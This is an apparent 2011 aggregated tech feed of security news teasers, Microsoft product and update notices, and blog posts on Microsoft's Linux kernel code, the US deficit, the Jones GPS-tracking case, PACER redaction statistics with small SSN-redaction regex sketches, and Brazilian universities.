Software that allows drivers to remotely unlock and start automobiles using cell phones is vulnerable to hacks that allow attackers to do the same thing, sometimes from thousands of miles away, it was widely reported Wednesday.…
The security breach that targeted sensitive data relating to RSA's SecurID two-factor authentication product has cost parent company EMC $66m in the second quarter, The Washington Post has reported.…
German computer scientists have taken advantage of the powerful number-crunching abilities of graphics chips to demonstrate a practical attack on the encryption scheme in programmable chips.…
Update BET24.com warned customers on Monday that their personal data may have been exposed by a breach that took place in December 2009.…
The head of a group that helps the federal government ward off computer attacks abruptly resigned Friday, amid a spate of high-profile assaults hitting government agencies and contractors.…
Hacktivists have posted "secret documents" stolen from an Italian cybercrime unit.…
The best way to defend against most network vulnerabilities is to deal with the simplest attack vectors, according to Australia’s Defence Signals Directorate (DSD).…
Weekend Following the success of hijacked network Free Libyana, we took the opportunity to talk to some engineers about the complexity of lifting someone else's infrastructure, and discovered there isn't much.…
Hackers have created a fake tool especially designed to exploit the laziness of the most clueless and unskilled phishing fraudsters.…
Pharmaceutical giant Pfizer's Facebook page has been defaced by mischief makers.…
Japanese authorities have jailed a serial malware writer for two-and-a-half years over his latest creation.…
Phishing fraudsters have latched on to a new target, with attacks designed to gain compromised access to frequent flyer accounts.…
LulzSec has abandoned plans to release a cache of News International emails it claimed to have acquired during a redirection attack on The Sun website earlier this week. Instead the group says it plans to release select batches of the emails via a "partnership" with select media outlets, an approach akin to that applied by WikiLeaks to its controversial US diplomatic cable and war log releases last year.…
Canadian police have arrested a man accused of planting key-logging malware on hundreds of computers across the world.…
Google is issuing warnings to people whose computers are infected with a type of malware that manipulates search requests.…
The promised dump of its emails from News International by hacktivist group LulzSec failed to materialise on Tuesday. However a prominent affiliate of the group told El Reg that the release had only been delayed, rather than postponed.…
Chinese search giant Baidu has launched its own web browser, aping Google's Chrome with web applications and aspirations of becoming a desktop replacement.…
The hacktivists behind a hack on The Sun's website claim to have extracted an email archive which they plan to release later on Tuesday.…
Hackers claim to have broken into the UK fansite of Lady GaGa before extracting the names and email addresses of thousands of her fans.…
Infamous pranktivist hackers LulzSec exploited basic security mistakes on a News International website to redirect users towards a fake story on the supposed death of media mogul Rupert Murdoch, it has emerged.…
Hackers breached the security of Rupert Murdoch's Sun website and briefly redirected many visitors to a hoax article falsely claiming the tabloid media tycoon had been found dead in his garden.…
Microsoft is offering a $250,000 reward for information leading to the arrest of those who controlled Rustock, a recently dismantled botnet that in its heyday was one of the biggest sources of illegal spam.…
Toshiba says that unidentified hackers have stolen customer records belonging to 7,500 of its customers.…
Almost half the security bugs chronicled by Secunia in the last year were not covered by a patch at the time of their publication.…
The United States may be forced to redesign an unnamed new weapon system now under development – because tech specs and plans were stolen from a defence contractor's databases.…
A Romanian accused of hacking NASA is fighting against an order to pay damages to the space agency.…
Truth is often stranger than fiction. Microsoft was the fifth-largest corporate contributor to Linux kernel version 3.0.0, as measured by the number of changes since its previous release. Only Red Hat, Intel, Novell, and IBM had more contributions. Microsoft was #15 as measured by the number of lines changed, which is smaller but is still an impressively large number.
This work by Microsoft was to clean up the “Microsoft Hyper-V (HV) driver” so that the Microsoft driver would be included in the mainline Linux kernel. Microsoft originally submitted this set of code changes back in July 2009, but there were a lot of problems with it, and the Linux kernel developers insisted that it be fixed. The Linux community had a long list of issues with Microsoft’s code, but the good news is that Microsoft worked to improve the quality of its code so that it could be accepted into the Linux kernel. Other developers helped Microsoft get their code up to par, too. ( Steve Friedl has some comments about its early technical issues.) There’s something rather amusing about watching Microsoft (a company that focuses on software development) being forced by the Linux community to improve the quality of Microsoft’s code. Anyone who thinks that FLOSS projects (which typically use widespread public peer review) always produce lower quality software than proprietary vendors just isn’t watching the real world (see my survey paper of quantitative FLOSS studies if you want more on that point). Peer review often exposes problems, so that they can be fixed, and that is what happened here.
Microsoft did not do this for the sheer thrill of it. Getting code into the mainline Linux kernel release, instead of just existing as a separate patch, is vitally important for an organization if they want people to use their software (if it needs to be part of the Linux kernel, as this did). A counter-example is that the Xen developers let KVM zoom ahead of them, because the Xen developers failed to set a high priority on getting full support for Xen into the mainline Linux kernel. As Thorsten Leemhuis at The H says, “There are many indications that the Xen developers should have put more effort into merging Xen support into the official kernel earlier. After all, while Xen was giving developers and distribution users a hard time with the old kernel, a new virtualisation star was rising on the open source horizon: KVM (Kernel-based Virtual Machine)… In the beginning, KVM could not touch the functional scope and speed of Xen. But soon, open source developers, Linux distributors, and companies such as AMD, Intel and IBM became interested in KVM and contributed a number of improvements, so that KVM quickly caught up and even moved past Xen in some respects.” Xen may do well in the future, but this is still a cautionary tale.
This doesn’t mean that Microsoft is suddenly releasing all its programs as free/libre/open source software (FLOSS). Far from it. It is obvious to me that Microsoft is contributing this code for the same reason many companies contribute to the Linux kernel and other FLOSS software projects: Money.
I think it is clear that Microsoft hopes that these changes to Linux will help Microsoft sell more Windows licenses. These changes enable Linux to run much better (e.g., more efficiently) on top of Microsoft Windows’ hypervisor (Hyper-V). Without them, people who want to run Linux on top of a hypervisor are much more likely to use products other than Microsoft’s. Microsoft doesn’t want to be at a competitive disadvantage in this market, so to sell its product, it chose to contribute changes to the Linux kernel. With this change, Microsoft Windows becomes a more viable option as a host operating system, running Linux as a guest.
Is this a big change? In some ways it is not. Microsoft has developed a number of FLOSS packages, such as WiX (for installing software on Windows), and it does all it can to encourage the development of FLOSS that run on Windows.
Still, it’s something of a change for Microsoft. Microsoft CEO Steve Ballmer stated in 2001 that Linux and the GNU GPL license were “a cancer”. This was in many ways an attack on FLOSS in general; the GNU GPL is the most popular FLOSS license by far, and a MITRE report found that the “GPL sufficiently dominates in DoD applications for a ban on GPL to closely approximate a full ban of all [FLOSS]”. This would have been disastrous for their customer, because MITRE found that FLOSS software “plays a far more critical role in the [Department of Defense] than has been generally recognized”. I think many other organizations would say the same. This is not even the first time Microsoft has gotten involved with the GPL. Microsoft sold Windows Services for Unix (SFU), which had GPL software, showing that even Microsoft understood that it was possible to make money while using the GPL license. But this case is far more extreme; in this case Microsoft is actively helping a product (the Linux kernel) that it also competes with. I don’t expect Microsoft to keep contributing significantly to the Linux kernel, at least for a while, but that doesn’t matter; here we see that cash trumps ideology. More generally, this beautifully illustrates collaborative development: Anyone can choose to work on specific areas of a FLOSS program, for their own specific or selfish reasons, to co-produce works that help us all.
Updated Security researchers claim to have uncovered a serious security hole in Vodafone's mobile network.…
Six out of every 10 users of Adobe Reader are running vulnerable versions of the ubiquitous PDF reader package, according to stats from freebie anti-virus scanner firm Avast.…
Sega's forum remains offline almost a month after its forums and other sites were hit by hacktivists.…
Anonymous has latched onto yet another new target with the release of potentially sensitive data from controversial agricultural giant Monsanto.…
You can go to Windows Intune Springboard site for information on signing up for your beta subscription. Once you have completed the sign-up process and activated your account, you can go to https://beta.manage.microsoft.com to begin evaluating the beta. A beta subscription will allow you to deploy to up to 10 PCs, which should allow you to evaluate the improvements we’ve made.
Here are the highlights of what’s new:
Software Distribution
Better Hardware Reporting and Filters
Third Party License Management
User Interface Enhancements
Remote Actions
Improvements to Alerts Workspace
Support for images
Note: This latest update (14.0.6106.5001) includes several stability and reliability fixes and supports the HTTPS protocol for all communication between Microsoft Outlook and Windows Live Hotmail, Calendar and Contacts.
With Microsoft Outlook Hotmail Connector 32-bit, you can use Microsoft Office Outlook 2003, Microsoft Office Outlook 2007 or Microsoft Office Outlook 2010 to access and manage your Microsoft Windows Live Hotmail or Microsoft Office Live Mail accounts, including e-mail messages, contacts and calendars for free!
Outlook Hotmail Connector enables you to use your Live Hotmail accounts within Outlook:
The links in this section correspond to files available for this download. Download the files appropriate for you.
File Name | Size | |
---|---|---|
SQLManagementStudio_x64_ENU.exe | 155.0 MB | Download |
SQLManagementStudio_x86_ENU.exe | 153.0 MB | Download |
SQLServer2008R2SP1-KB2528583-IA64-ENU.exe | 296.0 MB | Download |
SQLServer2008R2SP1-KB2528583-x64-ENU.exe | 309.0 MB | Download |
SQLServer2008R2SP1-KB2528583-x86-ENU.exe | 201.0 MB | Download |
What’s New in SQL Server 2008 R2 Service Pack 1 ?
Anonymous uploaded 90,000 military email addresses and associated password hashes onto a file-sharing network on Monday as part of an operation it christened Military Meltdown Monday.…
Microsoft has disabled the search results on its Security Centre after malware-spreaders abused the function to promote shady pornographic websites serving Trojans as well as cheap thrills.…
A study of cybercrime economics shows that peddlers of rogue antivirus scams rely on legitimate banks to run their businesses, carefully ensuring that the volume of chargebacks they incur stay just on the right side of being flagged-up as obviously fraudulent.…
Portuguese hackers responded to a negative assessment of the country's ability to repay loans by defacing the website of credit reference agency Moody's.…
Microsoft is to issue four bulletins next Tuesday – one of which is critical – as part of the July edition of its Patch Tuesday update cycle.…
Chunlai Yang, a 49-year old Chinese-born American, has been charged with stealing proprietary software code.…
The latest jailbreak for iPhones, published on Wednesday, exploits a zero-day bug in iOS that only users of jailbroken devices will be able to fix, security experts warn.…
The zombie machines which formerly powered the infamous Rustock botnet are down to half their original number, according to Microsoft.…
One of the most common questions I get is “if I can bank online, why can’t I vote online?” A recently released (but undated) document, ”Supplement to Authentication in an Internet Banking Environment” from the Federal Financial Institutions Examination Council, addresses some of the risks of online banking. Krebs on Security has a nice writeup of the issues, noting that the guidelines call for 'layered security programs' to deal with these riskier transactions, such as:
[I've replaced bullets with numbers in Krebs’ posting in the above list to make it easier to reference below.]
So what does this have to do with voting? Well, if you look at them in turn and consider how you'd apply them to a voting system:
Unsaid, but of course implied by the financial industry list is that the goal is to reduce fraud to a manageable level. I’ve heard that 1% to 2% of the online banking transactions are fraudulent, and at that level it’s clearly not putting banks out of business (judging by profit numbers). However, whether we can accept as high a level of fraud in voting as in banking is another question.
None of this is to criticize the financial industry’s efforts to improve security! Rather, it’s to point out that try as we might, just because we can bank online doesn’t mean we should vote online.
Exchange Team Blog: We're excited to announce that later this year we'll be adding a new tool to our already rich portfolio of planning and deployment tools. This new tool, PST Capture, will be downloadable and free, and will enable you to discover .pst files on your network and then import them into both Exchange Online (in Office 365) and Exchange Server 2010 on-premises. PST Capture will be available later this year. It doesn’t replace the New-MailboxImportRequest cmdlet that exists already for importing known .pst files into Exchange Server, but instead works in parallel to enable you to embark on a systematic search and destroy mission to rid yourself of the dreaded .pst scourge.
Coming Soon PST Capture Tool - Exchange Team Blog - Site Home - TechNet Blogs
A backdoor has been discovered in the source code of a widely used FTP package.…
(This is a blog entry for U.S. citizens — everyone else can ignore it.)
We Americans must demand that the U.S. government work to balance its budget over time. The U.S. government has a massive annual deficit, resulting in a massive national debt that is growing beyond all reasonable bounds. For example, in just Fiscal Year (FY) 2010, about $3.4 trillion was spent, but only $2.1 trillion was received; that means that the U.S. government spent more than a trillion dollars more than it received. Every year that the government spends more than it receives it adds to the gross federal debt, which is now more than $13.6 trillion.
This is unsustainable. The fact that this is unsustainable is certainly not news. The U.S. Financial Condition and Fiscal Future Briefing (GAO, 2008) says, bluntly, that the “Current Fiscal Policy Is Unsustainable”. “The Moment of Truth: Report of the National Commission on Fiscal Responsibility and Reform” similarly says “Our nation is on an unsustainable fiscal path”. Many others have said the same. But even though it’s not news, it needs to be yelled from the rooftops.
The fundamental problem is that too many Americans — aka “we the people” — have not (so far) been willing to face this unpleasant fact. Fareed Zakaria nicely put this in February 21, 2010: “ … in one sense, Washington is delivering to the American people exactly what they seem to want. In poll after poll, we find that the public is generally opposed to any new taxes, but we also discover that the public will immediately punish anyone who proposes spending cuts in any middle class program which are the ones where the money is in the federal budget. Now, there is only one way to square this circle short of magic, and that is to borrow money, and that is what we have done for decades now at the local, state and federal level … The lesson of the polls in the recent elections is that politicians will succeed if they pander to this public schizophrenia. So, the next time you accuse Washington of being irresponsible, save some of that blame for yourself and your friends”.
But Americans must face the fact that we must balance the budget. And we must face it now. We must balance the budget the same way families balance their budgets — the government must raise income (taxes), lower expenditures (government spending), or both. Growth over time will not fix the problem.
How we reallocate income and outgo so that they match needs to be a political process. Working out compromises is what the political process is supposed to be all about; nobody gets everything they want, but eventually some sort of rough set of priorities must be worked out for the resources available. Compromise is not a dirty word to describe the job of politics; it is the job. In reality, I think we will need to both raise revenue and decrease spending. I think we must raise taxes to some small degree, but we can’t raise taxes on the lower or middle class much; they don’t have the money. Also, we will not be able to solve this by taxing the rich out of the country. Which means that we must cut spending somehow. Just cutting defense spending won’t work; defense is only 20% of the entire budget. In contrast, the so-called entitlements — mainly Medicare, Medicaid, and Social Security — are 43% of the government costs and rapidly growing in cost. I think we are going to have to lower entitlement spending; that is undesirable, but we can’t keep providing services we can’t pay for. The alternative is to dramatically increase taxes to pay for them, and I do not think that will work. Raising the age before Social Security benefits can normally be received is to me an obvious baby step, but again, that alone will not solve the problem. It’s clearly possible to hammer out approaches to make this work, as long as the various camps are willing to work out a compromise.
To get there, we need to specify and plan out the maximum debt that the U.S. will incur in each year, decreasing that each year (say, over a 10-year period). Then Congress (and the President) will need to work out, each year, how to meet that requirement. It doesn’t need to be any of the plans that have been put forward so far; there are lots of ways to do this. But unless we agree that we must live within our means, we will not be able to make the decisions necessary to do so. The U.S. is not a Greece, at least not now, but we must make decisions soon to prevent bad results. I am posting this on Independence Day; Americans have been willing to undergo lots of suffering to gain control over their destinies, and I think they are still able to do so today.
In the short term (say a year), I suspect we will need to focus on short-term recovery rather than balancing the budget. And we must not default. But we must set the plans in motion to stop the runaway deficit, and get that budget balanced. The only way to get there is for the citizenry to demand it stop, before far worse things happen.
Microsoft Security Essentials 2.1
Doesn’t tell what’s new, but download it at the MSE site:
Virus, Spyware & Malware Protection Microsoft Security Essentials
One of the world's stealthiest pieces of malware infected more than 4.5 million PCs in just three months, making it possible for its authors to force keyloggers, adware, and other malicious programs on the compromised machines at any time.…
So I just installed Office 2010 Service Pack 1, and when you look at the Help screen in the Backstage pane, it doesn’t show that Service Pack 1 is installed; only the build number is higher.
Why does Microsoft do this? Why make it hard for end users, administrators, and support personnel to determine the Service Pack level? Now you need to puzzle over build numbers.
Also, my Office seems to be activated twice??
UPDATE, thanks to commenters: “just click on the "Additional Version and Copyright Information" and it will show the traditional Help --> About screen”
Office 2010 Service Pack 1 released today and it available for downloading from the following links:
Service Pack 1 for Microsoft Office 2010 (KB2460049) 64-bit Edition
Service Pack 1 for Microsoft Office 2010 (KB2460049) 32-bit Edition
http://support.microsoft.com/kb/2460049
Updated Microsoft is advising users to roll-back Windows if they happen to be unfortunate enough to get hit by a particularly vicious rootkit.…
Steve Ballmer will announce news detailing the latest on Office 365 on Tuesday, June 28, at 10 a.m. EDT / 7 a.m. PDT. Watch the webcast here.
…available in 40 markets. Since its beta introduction last year, more than 200,000 organizations have signed up and begun testing it. Businesses testing Office 365 are already reporting impressive results, reducing IT costs by up to an estimated 50% while boosting productivity.
Office 365 offers a wide range of service plans for a predictable monthly price from $2 to $27 per user per month. With Office 365 for small businesses, customers can be up and running with Office Web Apps, Microsoft Exchange Online, Microsoft SharePoint Online, Microsoft Lync Online and an external website in minutes, for $6 (U.S.) per user, per month. These tools put enterprise-grade email, shared documents, instant messaging, video and Web conferencing, portals and more at everyone’s fingertips.
Office 365 for enterprises has an array of choices, from simple email to comprehensive suites, to meet the needs of midsize and large businesses as well as government organizations. Customers can now get Microsoft Office Professional Plus on a pay-as-you-go basis with cloud-based versions of the industry’s leading business communications and collaboration services. Each of these plans comes with the advanced IT controls, security, 24x7 IT support and reliability customers expect from Microsoft.
Today, more than 20 service providers around the globe also shared plans to bring Office 365 to their customers this year. Bell Canada, Intuit Inc., NTT Communications Corporation, Telefonica S.A., Telstra Corp. and Vodafone Ltd., among others, will package and sell Office 365 with their own services — from Web hosting and broadband to finance solutions and mobile services — and bring those new offerings to millions of small and midsize businesses globally.
Zombie movie star Simon Pegg was obliged to warn his followers after his Twitter feed was hacked to post links to malware.…
Microsoft will announce and release Office 2010 Service Pack 1 on Tuesday.
The software giant is readying the Office 2010 SP1 release alongside the general availability launch of Office 365. Microsoft had previously promised Office 2010 SP1 “by the end of June.” WinRumors understands, from sources familiar with Microsoft’s plans, that the SP1 download will be made available at 9AM PST on Tuesday June 28. SP1 releases for both Office client suites and SharePoint server products will be made available. All language versions of SP1 will release at the same time. Service Pack 1 will be offered as a manual download from the Download Center and from Microsoft Update.
Microsoft will include the following important fixes in SP1:
Microsoft plans to include the following security and non-security related fixes:
Office 2010 SP1 to be released this week WinRumors
This morning, the Supreme Court agreed to hear an appeal next term of United States v. Jones (formerly United States v. Maynard), a case in which the D.C. Circuit Court of Appeals suppressed evidence of a criminal defendant's travels around town, which the police collected using a tracking device they attached to his car. For more background on the case, consult the original opinion and Orin Kerr's previous discussions about the case.
No matter what the Court says or holds, this case will probably prove to be a landmark. Watch it closely.
(1) Even if the Court says nothing else, it will face the constitutionality of the use by police of tracking beepers to follow criminal suspects. In a pair of cases from the mid-1980s, the Court held that the police did not need a warrant to use a tracking beeper to follow a car around on public, city streets (Knotts) but did need a warrant to follow a beeper that was moved indoors (Karo) because it "reveal[ed] a critical fact about the interior of the premises." By direct application of these cases, the warrantless tracking in Jones seems constitutional, because it was restricted to movement on public, city streets.
Not so fast, said the D.C. Circuit. In Jones, the police tracked the vehicle 24 hours a day for four weeks. Citing the "mosaic theory often invoked by the Government in cases involving national security information," the Court held that the whole can sometimes be more than the parts. Tracking a car continuously for a month is constitutionally different in kind not just degree from tracking a car along a single trip. This is a new approach to the Fourth Amendment, one arguably at odds with opinions from other Courts of Appeal.
(2) This case gives the Court the opportunity to speak generally about the Fourth Amendment and location privacy. Depending on what it says, it may provide hints for lower courts struggling with the government's use of cell phone location information, for example.
(3) For support of its embrace of the mosaic theory, the D.C. Circuit cited a 1989 Supreme Court case, U.S. Department of Justice v. National Reporters Committee. In this case, which involved the Freedom of Information Act (FOIA) not the Fourth Amendment, the Court allowed the FBI to refuse to release compiled "rap sheets" about organized crime suspects, even though the rap sheets were compiled mostly from "public" information obtainable from courthouse records. In agreeing that the rap sheets nevertheless fell within a "personal privacy" exemption from FOIA, the Court embraced, for the first time, the idea that the whole may be worth more than the parts. The Court noted the difference "between scattered disclosure of the bits of information contained in a rap-sheet and revelation of the rap-sheet as a whole," and found a "vast difference between the public records that might be found after a diligent search of courthouse files, county archives, and local police stations throughout the country and a computerized summary located in a single clearinghouse of information." (FtT readers will see the parallels to the debates on this blog about PACER and RECAP.) In summary, it found that "practical obscurity" could amount to privacy.
Practical obscurity is an idea that hasn't gotten much traction in the Courts since National Reporters Committee. But it is an idea well-loved by many privacy scholars, including myself, for whom it helps explain their concerns about the privacy implications of data aggregation and mining of supposedly "public" data.
The Court, of course, may choose a narrow route for affirming or reversing the D.C. Circuit. But if it instead speaks broadly or categorically about the viability of practical obscurity as a legal theory, this case might set a standard that we will be debating for years to come.
Free security software outfit Avast reckons unprotected Windows desktops still offer its greatest potential area for growth, despite its huge existing Windows user-base of 130 million active users.…
Federal authorities say they have crippled a notorious botnet that penetrated some of the world's most sensitive organizations, thanks to an unprecedented take-down strategy that used a government-run server that communicated directly with infected PCs.…
A former college student has admitted taking part in a criminal scheme that used malware to steal and sell large databases of faculty and alumni, change grades, and siphon funds from other students' accounts.…
Earlier today the Exchange CXP team released Update Rollup 4 for Exchange Server 2010 SP1 to the Download Center.
This update contains fixes for a number of customer-reported and internally found issues since the release of RU1. See 'KB 2509910: Description of Update Rollup 4 for Exchange Server 2010 Service Pack 1' for more details. In particular we would like to specifically call out the following fixes which are included in this release:
Some of the above KnowledgeBase articles are not replicated/live at the time of writing this post. Please check back later in the day if you can't reach them.
Update Rollup 5 for Exchange Server 2010 Service Pack 1 is currently scheduled to release in August 2011.
Note for Exchange 2010 Customers using the Arabic and Hebrew language version: We introduced two new languages with the release of Service Pack 1, Arabic and Hebrew. At present we are working through the process of modifying our installers to incorporate these two languages. Customers running either of the two language versions affected are advised to download and install the English language version of the rollup which contains all of the same fixes.
Note for Forefront users: For those of you running Forefront Security for Exchange, be sure you perform these important steps from the command line in the Forefront directory before and after this rollup's installation process. Without these steps, Exchange services for Information Store and Transport will not start after you apply this update. Before installing the update, disable ForeFront by using this command: fscutility /disable. After installing the update, re-enable ForeFront by running fscutility /enable
WordPress is requiring all account holders on the WordPress.org website to change their passwords following the discovery that hackers contaminated it with malicious software.…
You know your virtual currency has hit the big leagues when criminals develop trojans that infect computers for the sole purpose of stealing it. Bitcoin, the open-source project launched two years ago, reached that turning point Thursday.…
The System Center Orchestrator 2012 Beta product provides the capability to automate workflows (Runbooks) across other System Center and 3rd-party products. These runbooks are created in the Runbook Designer, deployed via the Deployment Manager, and run and monitored locally or remotely via the Orchestrator Console.
Feature Bullet Summary:
Download details System Center Orchestrator 2012 Beta
Google has downplayed concerns that refinements to its search technology could leave surfers more exposed to search engine manipulation attacks.…
In my research on privacy problems in PACER, I spent a lot of time examining PACER documents. In addition to researching the problem of "bad" redactions, I was also interested in learning about the pattern of redactions generally. To this end, my software looked for two redaction styles. One is the "black rectangle" redaction method I described in my previous post. This method sometimes fails, but most of these redactions were done successfully. The more common method (around two-thirds of all redactions) involves replacing sensitive information with strings of XXs.
Out of the 1.8 million documents it scanned, my software identified around 11,000 documents that appeared to have redactions. Many of them could be classified automatically (for example "123-45-xxxx" is clearly a redacted Social Security number, and "Exxon" is a false positive) but I examined several thousand by hand.
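The automatic part of that classification can be approximated with simple pattern matching. Here is a rough sketch of the idea in Python; my actual tooling was more involved, and the patterns and the small false-positive list below are only illustrative:

```python
import re

# "123-45-xxxx" is clearly a redacted SSN; words such as "Exxon" also contain
# runs of Xs, so keep a small list of known false positives.
REDACTED_SSN = re.compile(r"\b\d{3}-\d{2}-[xX]{4}\b")
XX_RUN = re.compile(r"[xX]{2,}")
FALSE_POSITIVES = {"exxon", "xxiii"}  # illustrative entries only

def classify(text: str) -> str:
    """Return a rough label for one snippet of document text."""
    if REDACTED_SSN.search(text):
        return "redacted SSN"
    for match in XX_RUN.finditer(text):
        # Inspect the whole word surrounding the run of Xs.
        start = text.rfind(" ", 0, match.start()) + 1
        end = text.find(" ", match.end())
        word = text[start:end if end != -1 else None].strip(".,;").lower()
        if word not in FALSE_POSITIVES:
            return "possible redaction"
    return "no redaction found"

print(classify("SSN: 123-45-xxxx"))         # -> redacted SSN
print(classify("Exxon Mobil Corporation"))  # -> no redaction found
print(classify("Account no. XXXXXX1234"))   # -> possible redaction
```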
Here is the distribution of the redacted documents I found.
Type of Sensitive Information | No. of Documents |
---|---|
Social Security number | 4315 |
Bank or other account number | 675 |
Address | 449 |
Trade secret | 419 |
Date of birth | 290 |
Unique identifier other than SSN | 216 |
Name of person | 129 |
Phone, email, IP address | 60 |
National security related | 26 |
Health information | 24 |
Miscellaneous | 68 |
Total | 6208 |
To reiterate the point I made in my last post, I didn't have access to a random sample of the PACER corpus, so we should be cautious about drawing any precise conclusions about the distribution of redacted information in the entire PACER corpus.
Still, I think we can draw some interesting conclusions from these statistics. It's reasonable to assume that the distribution of redacted sensitive information is similar to the distribution of sensitive information in general. That is, assuming that parties who redact documents do a decent job, this list gives us a (very rough) idea of what kinds of sensitive information can be found in PACER documents.
The most obvious lesson from these statistics is that Social Security numbers are by far the most common type of redacted information in PACER. This is good news, since it's relatively easy to build software to automatically detect and redact Social Security numbers.
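For example, a few lines of regular-expression code catch the common SSN formats. This is a sketch only: real filings contain more variants, bare nine-digit matches can be false positives, and any automated redaction would still need human review:

```python
import re

# Common SSN layouts: 123-45-6789, 123 45 6789, or a bare nine-digit run.
# A bare nine-digit number is not necessarily an SSN, which is why a human
# still needs to review anything a script like this rewrites.
SSN = re.compile(r"\b\d{3}[- ]?\d{2}[- ]?\d{4}\b")

def redact_ssns(text: str) -> str:
    """Replace anything shaped like an SSN with a fixed placeholder."""
    return SSN.sub("xxx-xx-xxxx", text)

print(redact_ssns("Debtor SSN 123-45-6789, filed 2011."))
# -> Debtor SSN xxx-xx-xxxx, filed 2011.
```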
Another interesting case is the "address" category. Almost all of the redacted items in this category—393 out of 449—appear in the District of Columbia District. Many of the documents relate to search warrants and police reports, often in connection with drug cases. I don't know if the high rate of redaction reflects the different mix of cases in the DC District, or an idiosyncratic redaction policy voluntarily pursued by the courts and/or the DC police but not by officials in other districts. It's worth noting that the redaction of addresses doesn't appear to be required by the federal redaction rules.
Finally, there's the category of "trade secrets," which is a catch-all term I used for documents whose redactions appear to be confidential business information. Private businesses may have a strong interest in keeping this information confidential, but the public interest in such secrecy here is less clear.
To summarize, out of 6208 redacted documents, there are 4315 Social Security numbers that can be redacted automatically by machine, 449 addresses whose redaction doesn't seem to be required by the rules of procedure, and 419 "trade secrets" whose release will typically only harm the party who fails to redact them.
That leaves around 1000 documents that would expose risky confidential information if not properly redacted, or about 0.05 percent of the 1.8 million documents I started with. A thousand documents is worth taking seriously (especially given that there are likely to be tens of thousands in the full PACER corpus). The courts should take additional steps to monitor compliance with the redaction rules and sanction parties who fail to comply with them, and they should explore techniques to automate the detection of redaction failures in these categories.
But at the same time, a sense of perspective is important. This tiny fraction of PACER documents with confidential information in them is a cause for concern, but it probably isn't a good reason to limit public access to the roughly 99.9 percent of documents that contain no sensitive information and may be of significant benefit to the public.
Thanks again to Carl Malamud and Public.Resource.Org for their support of my research.
Adobe has rolled out updates for its widely used Reader PDF viewer and Flash animation programs that fix flaws, some that hackers have been exploiting to hijack end user computers.…
When Brazilian president Dilma Roussef visited China in the beginning of May, she came back with some good news (maybe too good to be entirely true). Among them, the announcement that Foxconn, the largest maker of electronic components, will invest US$12 billion to open a large industrial plant in the country. The goal is to produce iPads and other key electronic components locally.
The announcement was praised and quickly made the headlines of all major newspapers. There is certainly reason for excitement. Brazil missed important waves of economic development, including industrialization (which only really happened in the 1940s) and the semiconductor wave, an industry that has shown only a few signs of development in the country until now.
The president's news also included the announcement that Foxconn would hire 100,000 employees for the new plant, 20% of them engineers. The numbers raised skepticism for various reasons. Not only do they seem exaggerated, but Brazil simply does not have 20,000 engineers available for hire. In 2008, the number of engineers in the country was 750,000, and the projection is that if growth rates continue at the same level, a shortage of engineers is expected in the coming years.
The situation increases the pressure on universities to train engineers and to cope with the demands of development and innovation. This is a complex debate, but it is worth focusing on one aspect of the Brazilian university system: its isolation from the rest of the world. In short, Brazilian universities, in terms of both students and faculty, are almost entirely made up of Brazilians. As an example, at the University of Sao Paulo (USP), the largest and most important university in the country, only 2.8% of a total of 56,000 students are international. In most other universities the share of international students tends to be even smaller. Regarding faculty, the situation is no different. There have been a few recent efforts by some institutions (mostly private) to increase the number of international professors, but there is still a long way to go.
The low degree of internationalization is already causing problems. For instance, it makes it difficult for Brazilian universities to score well in world rankings. By way of example, no Brazilian university has ever been included in the top 200 of the Times Higher Education World Ranking, which pays special attention to internationalization efforts.
Even if rankings are not the main issue, the fact that the university system is essentially inward-looking does create problems, making innovation harder. For instance, many of the engineers for Foxconn's new plant might end up being hired abroad. If some sort of integration with Brazilian universities is not established, that will be a missed opportunity for transferring technology and developing local capacity.
The challenges of integrating such a large operation with universities are huge. Even for small-scale cooperation, it turns out that most universities in Brazil are unprepared to deal with international visitors, whether students or faculty. For an international professor to be formally hired by a local university, she will in most cases have to validate her degree in Brazil. The validation process can be Kafkaesque, requiring lots of paperwork (including "sworn translations") and time, often months or years. This poses a challenge not only for professors seeking to teach in Brazil, but also for Brazilians who obtain a degree abroad and return home. Local boards of education do not recognize international degrees, regardless of whether they were awarded by Princeton or the Free University of Berlin. Students return home formally with the same academic credentials they had before obtaining a degree abroad. The market often recognizes the value of international degrees, but the university system does not.
The challenges are visible at the practical level as well. Most universities do not have an office in charge of foreign admissions or of international faculty and students. Many professors who venture into the Brazilian university system go through the process without formal support, counting on the efforts and enthusiasm of local peers who take on the work of handling the details of the visit (obtaining a visa and work permit, or navigating the long bureaucratic steps required before the visitor's salary is actually paid).
The lack of internationalization is bad for innovation. As Princeton computer science professor Kai Li pointed out during a recent conference on technology cooperation between the US and China organized by the Center for Information Technology Policy, the presence of international students and faculty in US universities has been crucial for innovation. Kai emphasized the importance of maintaining an ecosystem for innovation, which not only attracts the best students to local universities but helps retain them after graduation. Many will work in research, create start-ups, or take jobs in the tech industry. The same point was made by Lawrence Lessig in his recent G8 talk in France, where he argued that a great deal of innovation in the US has come from "outsiders".
Another important aspect of the lack of internationalization in Brazil is the lack of institutional support. Government funding organizations, such as CAPES, CNPq, Fapesp and others, play an important role. But Brazil still lacks both public and private institutions aimed specifically at promoting integration, Brazilian culture, and international exchange (along the lines of Fulbright, the Humboldt Foundation, or institutes like Cervantes, Goethe, or the British Council).
As Volker Grassmuck, a German media studies professor who spent 18 months as a researcher at the University of Sao Paulo, put it: “The Brazilian funding institutions do have grants for visiting researchers, but the application has to be submitted locally by the institution. At the end of my year in Sao Paulo I applied to FAPESP, the research funding agency of the state of Sao Paulo, but it did not work out, since my research group did not have a research project formalized there”.
He compares the situation with German universities: “When I started teaching at Paderborn University, which is a young (founded in 1972), mid-sized (15,000 students) university in a small town, the first time I walked across campus I heard Indian, Vietnamese, Chinese, Arabic, Turkish and Spanish. At USP, during the entire year, I never heard anything but Portuguese”. (See Volker's full interview below.)
Of course, any internationalization process at this point has to be very well planned. In Brazil, 25% of universities are public and 75% are private. There is still a huge shortage of places for local students, even with the university population growing quite fast over the past six years: in 2004 Brazil had 4.1 million university students, and by 2010 the number had reached 6.5 million. Even so, only 20% of young students in Brazil find a place in the university system, compared with 43% in Chile and 61% in Argentina. The country still struggles to provide access to its own students. But the effort of internationalization should not be understood as competing with expanding access. The challenge for Brazil is to do both things at the same time: expand access for local students and promote internationalization. If Brazil wants to play a role as an important emerging economy, that's the way to go (no one said it would be easy!). One thing should not exclude the other.
